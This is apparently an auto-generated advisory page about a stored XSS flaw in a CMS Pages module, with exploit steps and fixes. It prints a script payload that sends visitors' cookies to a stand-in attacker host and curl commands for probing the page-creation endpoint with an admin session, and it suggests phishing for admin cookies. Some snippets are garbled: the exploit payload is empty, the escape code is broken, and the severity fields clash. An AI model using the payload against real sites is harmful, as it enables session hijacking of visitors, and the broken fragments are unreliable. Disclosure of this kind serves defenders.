Listen to this Post
How the mentioned CVE works: The Pages module fails to apply the html_purify validation rule to content fields during create and update operations, unlike the Blog module which correctly sanitizes. An authenticated admin with page-editing privileges can inject arbitrary JavaScript into page content. The unsanitized input is stored directly in the database via modules/Pages/Controllers/Pages.php lines 111 and 157. On the public frontend, app/Views/templates/default/pages.php line 32 renders the content as raw HTML using `echo $pageInfo->content` without escaping. The html_purify rule defined in modules/Backend/Validation/CustomRules.php uses HTMLPurifier to strip dangerous tags, but its absence allows script tags and event handlers. An attacker creates a page with a payload like <script>document.location="https://attacker.example/?c="+document.cookie</script>. Any unauthenticated visitor viewing that page triggers the script, sending cookies to the attacker. The attack requires admin session (PR:H) but affects all public visitors (S:C). Lower-privileged admins can compromise higher-privileged admin sessions.
dailycve form:
Platform: Unknown CMS
Version: Not specified
Vulnerability: Stored XSS
Severity: Critical
date: 2026-04-09
Prediction: Patch expected 2026-04-16
Analytics under What Undercode Say:
Identify vulnerable endpoints curl -s https://target/backend/pages/create -b "ci_session=ADMIN_SESSION" -X POST -d "lang[bash][content]=<script>alert(1)</script>" | grep -i "error" Check if html_purify missing in validation grep -A2 "lang..content" modules/Pages/Controllers/Pages.php | grep -v html_purify Simulate attack impact on visitor logs tail -f /var/log/nginx/access.log | grep "attacker.example"
how Exploit:
- Obtain admin session cookie via phishing or compromised account.
- Send POST to `/backend/pages/create` with payload: `lang[bash][content]=`
3. Publish page and share public URL.
- Victim visits page, script exfiltrates cookies to attacker server.
Protection from this CVE:
- Add `|html_purify` to validation rules in Pages controller (lines 82 and 130).
- Escape output in view: `content, ‘raw’) ?>` after purification.
- Apply Content Security Policy (CSP) to block inline scripts.
- Limit admin page-editing privileges to trusted users only.
Impact:
- Session hijacking of any visitor including other admins.
- Credential theft via fake login forms or keyloggers.
- Site defacement and malware distribution to all public viewers.
- Complete compromise of multi-admin CMS environment from low-privileged admin.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

